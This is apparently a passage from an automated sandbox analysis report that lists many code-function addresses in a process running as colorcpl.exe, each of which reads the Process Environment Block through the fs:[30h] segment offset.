              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730770 mov eax, dword ptr fs:[00000030h]10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720750 mov eax, dword ptr fs:[00000030h]10_2_22720750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762750 mov eax, dword ptr fs:[00000030h]10_2_22762750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762750 mov eax, dword ptr fs:[00000030h]10_2_22762750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE75D mov eax, dword ptr fs:[00000030h]10_2_227AE75D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A4755 mov eax, dword ptr fs:[00000030h]10_2_227A4755
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275674D mov esi, dword ptr fs:[00000030h]10_2_2275674D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275674D mov eax, dword ptr fs:[00000030h]10_2_2275674D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275674D mov eax, dword ptr fs:[00000030h]10_2_2275674D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275273C mov eax, dword ptr fs:[00000030h]10_2_2275273C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275273C mov ecx, dword ptr fs:[00000030h]10_2_2275273C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275273C mov eax, dword ptr fs:[00000030h]10_2_2275273C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279C730 mov eax, dword ptr fs:[00000030h]10_2_2279C730
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C720 mov eax, dword ptr fs:[00000030h]10_2_2275C720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C720 mov eax, dword ptr fs:[00000030h]10_2_2275C720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720710 mov eax, dword ptr fs:[00000030h]10_2_22720710
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22750710 mov eax, dword ptr fs:[00000030h]10_2_22750710
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C700 mov eax, dword ptr fs:[00000030h]10_2_2275C700
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227247FB mov eax, dword ptr fs:[00000030h]10_2_227247FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227247FB mov eax, dword ptr fs:[00000030h]10_2_227247FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227427ED mov eax, dword ptr fs:[00000030h]10_2_227427ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227427ED mov eax, dword ptr fs:[00000030h]10_2_227427ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227427ED mov eax, dword ptr fs:[00000030h]10_2_227427ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE7E1 mov eax, dword ptr fs:[00000030h]10_2_227AE7E1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272C7C0 mov eax, dword ptr fs:[00000030h]10_2_2272C7C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A07C3 mov eax, dword ptr fs:[00000030h]10_2_227A07C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227207AF mov eax, dword ptr fs:[00000030h]10_2_227207AF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D47A0 mov eax, dword ptr fs:[00000030h]10_2_227D47A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C678E mov eax, dword ptr fs:[00000030h]10_2_227C678E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274A470 mov eax, dword ptr fs:[00000030h]10_2_2274A470
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274A470 mov eax, dword ptr fs:[00000030h]10_2_2274A470
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274A470 mov eax, dword ptr fs:[00000030h]10_2_2274A470
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC460 mov ecx, dword ptr fs:[00000030h]10_2_227AC460
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DA456 mov eax, dword ptr fs:[00000030h]10_2_227DA456
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274245A mov eax, dword ptr fs:[00000030h]10_2_2274245A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A430 mov eax, dword ptr fs:[00000030h]10_2_2275A430
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E420 mov eax, dword ptr fs:[00000030h]10_2_2271E420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E420 mov eax, dword ptr fs:[00000030h]10_2_2271E420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E420 mov eax, dword ptr fs:[00000030h]10_2_2271E420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271C427 mov eax, dword ptr fs:[00000030h]10_2_2271C427
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758402 mov eax, dword ptr fs:[00000030h]10_2_22758402
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758402 mov eax, dword ptr fs:[00000030h]10_2_22758402
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758402 mov eax, dword ptr fs:[00000030h]10_2_22758402
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227204E5 mov ecx, dword ptr fs:[00000030h]10_2_227204E5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227544B0 mov ecx, dword ptr fs:[00000030h]10_2_227544B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AA4B0 mov eax, dword ptr fs:[00000030h]10_2_227AA4B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227264AB mov eax, dword ptr fs:[00000030h]10_2_227264AB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DA49A mov eax, dword ptr fs:[00000030h]10_2_227DA49A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275656A mov eax, dword ptr fs:[00000030h]10_2_2275656A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275656A mov eax, dword ptr fs:[00000030h]10_2_2275656A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275656A mov eax, dword ptr fs:[00000030h]10_2_2275656A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728550 mov eax, dword ptr fs:[00000030h]10_2_22728550
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728550 mov eax, dword ptr fs:[00000030h]10_2_22728550
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E53E mov eax, dword ptr fs:[00000030h]10_2_2274E53E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6500 mov eax, dword ptr fs:[00000030h]10_2_227B6500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4500 mov eax, dword ptr fs:[00000030h]10_2_227F4500
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227225E0 mov eax, dword ptr fs:[00000030h]10_2_227225E0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274E5E7 mov eax, dword ptr fs:[00000030h]10_2_2274E5E7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C5ED mov eax, dword ptr fs:[00000030h]10_2_2275C5ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C5ED mov eax, dword ptr fs:[00000030h]10_2_2275C5ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227265D0 mov eax, dword ptr fs:[00000030h]10_2_227265D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A5D0 mov eax, dword ptr fs:[00000030h]10_2_2275A5D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A5D0 mov eax, dword ptr fs:[00000030h]10_2_2275A5D0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E5CF mov eax, dword ptr fs:[00000030h]10_2_2275E5CF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E5CF mov eax, dword ptr fs:[00000030h]10_2_2275E5CF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227445B1 mov eax, dword ptr fs:[00000030h]10_2_227445B1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227445B1 mov eax, dword ptr fs:[00000030h]10_2_227445B1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A05A7 mov eax, dword ptr fs:[00000030h]10_2_227A05A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A05A7 mov eax, dword ptr fs:[00000030h]10_2_227A05A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A05A7 mov eax, dword ptr fs:[00000030h]10_2_227A05A7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E59C mov eax, dword ptr fs:[00000030h]10_2_2275E59C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22722582 mov eax, dword ptr fs:[00000030h]10_2_22722582
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22722582 mov ecx, dword ptr fs:[00000030h]10_2_22722582
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22754588 mov eax, dword ptr fs:[00000030h]10_2_22754588
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279CA72 mov eax, dword ptr fs:[00000030h]10_2_2279CA72
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279CA72 mov eax, dword ptr fs:[00000030h]10_2_2279CA72
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA6F mov eax, dword ptr fs:[00000030h]10_2_2275CA6F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA6F mov eax, dword ptr fs:[00000030h]10_2_2275CA6F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA6F mov eax, dword ptr fs:[00000030h]10_2_2275CA6F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CEA60 mov eax, dword ptr fs:[00000030h]10_2_227CEA60
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22726A50 mov eax, dword ptr fs:[00000030h]10_2_22726A50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730A5B mov eax, dword ptr fs:[00000030h]10_2_22730A5B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730A5B mov eax, dword ptr fs:[00000030h]10_2_22730A5B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22744A35 mov eax, dword ptr fs:[00000030h]10_2_22744A35
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22744A35 mov eax, dword ptr fs:[00000030h]10_2_22744A35
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA38 mov eax, dword ptr fs:[00000030h]10_2_2275CA38
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275CA24 mov eax, dword ptr fs:[00000030h]10_2_2275CA24
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EA2E mov eax, dword ptr fs:[00000030h]10_2_2274EA2E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227ACA11 mov eax, dword ptr fs:[00000030h]10_2_227ACA11
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275AAEE mov eax, dword ptr fs:[00000030h]10_2_2275AAEE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275AAEE mov eax, dword ptr fs:[00000030h]10_2_2275AAEE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720AD0 mov eax, dword ptr fs:[00000030h]10_2_22720AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22754AD0 mov eax, dword ptr fs:[00000030h]10_2_22754AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22754AD0 mov eax, dword ptr fs:[00000030h]10_2_22754AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776ACC mov eax, dword ptr fs:[00000030h]10_2_22776ACC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776ACC mov eax, dword ptr fs:[00000030h]10_2_22776ACC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776ACC mov eax, dword ptr fs:[00000030h]10_2_22776ACC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728AA0 mov eax, dword ptr fs:[00000030h]10_2_22728AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728AA0 mov eax, dword ptr fs:[00000030h]10_2_22728AA0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22776AA4 mov eax, dword ptr fs:[00000030h]10_2_22776AA4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758A90 mov edx, dword ptr fs:[00000030h]10_2_22758A90
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272EA80 mov eax, dword ptr fs:[00000030h]10_2_2272EA80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4A80 mov eax, dword ptr fs:[00000030h]10_2_227F4A80
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271CB7E mov eax, dword ptr fs:[00000030h]10_2_2271CB7E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22718B50 mov eax, dword ptr fs:[00000030h]10_2_22718B50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F2B57 mov eax, dword ptr fs:[00000030h]10_2_227F2B57
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CEB50 mov eax, dword ptr fs:[00000030h]10_2_227CEB50
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4B4B mov eax, dword ptr fs:[00000030h]10_2_227D4B4B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4B4B mov eax, dword ptr fs:[00000030h]10_2_227D4B4B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6B40 mov eax, dword ptr fs:[00000030h]10_2_227B6B40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6B40 mov eax, dword ptr fs:[00000030h]10_2_227B6B40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EAB40 mov eax, dword ptr fs:[00000030h]10_2_227EAB40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C8B42 mov eax, dword ptr fs:[00000030h]10_2_227C8B42
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EB20 mov eax, dword ptr fs:[00000030h]10_2_2274EB20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EB20 mov eax, dword ptr fs:[00000030h]10_2_2274EB20
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E8B28 mov eax, dword ptr fs:[00000030h]10_2_227E8B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E8B28 mov eax, dword ptr fs:[00000030h]10_2_227E8B28
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279EB1D mov eax, dword ptr fs:[00000030h]10_2_2279EB1D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227F4B00 mov eax, dword ptr fs:[00000030h]10_2_227F4B00
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728BF0 mov eax, dword ptr fs:[00000030h]10_2_22728BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728BF0 mov eax, dword ptr fs:[00000030h]10_2_22728BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728BF0 mov eax, dword ptr fs:[00000030h]10_2_22728BF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274EBFC mov eax, dword ptr fs:[00000030h]10_2_2274EBFC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227ACBF0 mov eax, dword ptr fs:[00000030h]10_2_227ACBF0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227CEBD0 mov eax, dword ptr fs:[00000030h]10_2_227CEBD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740BCB mov eax, dword ptr fs:[00000030h]10_2_22740BCB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740BCB mov eax, dword ptr fs:[00000030h]10_2_22740BCB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22740BCB mov eax, dword ptr fs:[00000030h]10_2_22740BCB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720BCD mov eax, dword ptr fs:[00000030h]10_2_22720BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720BCD mov eax, dword ptr fs:[00000030h]10_2_22720BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720BCD mov eax, dword ptr fs:[00000030h]10_2_22720BCD
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730BBE mov eax, dword ptr fs:[00000030h]10_2_22730BBE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730BBE mov eax, dword ptr fs:[00000030h]10_2_22730BBE
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4BB0 mov eax, dword ptr fs:[00000030h]10_2_227D4BB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D4BB0 mov eax, dword ptr fs:[00000030h]10_2_227D4BB0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE872 mov eax, dword ptr fs:[00000030h]10_2_227AE872
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE872 mov eax, dword ptr fs:[00000030h]10_2_227AE872
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6870 mov eax, dword ptr fs:[00000030h]10_2_227B6870
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227B6870 mov eax, dword ptr fs:[00000030h]10_2_227B6870
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22750854 mov eax, dword ptr fs:[00000030h]10_2_22750854
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724859 mov eax, dword ptr fs:[00000030h]10_2_22724859
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22724859 mov eax, dword ptr fs:[00000030h]10_2_22724859
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22732840 mov ecx, dword ptr fs:[00000030h]10_2_22732840
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov ecx, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22742835 mov eax, dword ptr fs:[00000030h]10_2_22742835
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A830 mov eax, dword ptr fs:[00000030h]10_2_2275A830
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C483A mov eax, dword ptr fs:[00000030h]10_2_227C483A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C483A mov eax, dword ptr fs:[00000030h]10_2_227C483A
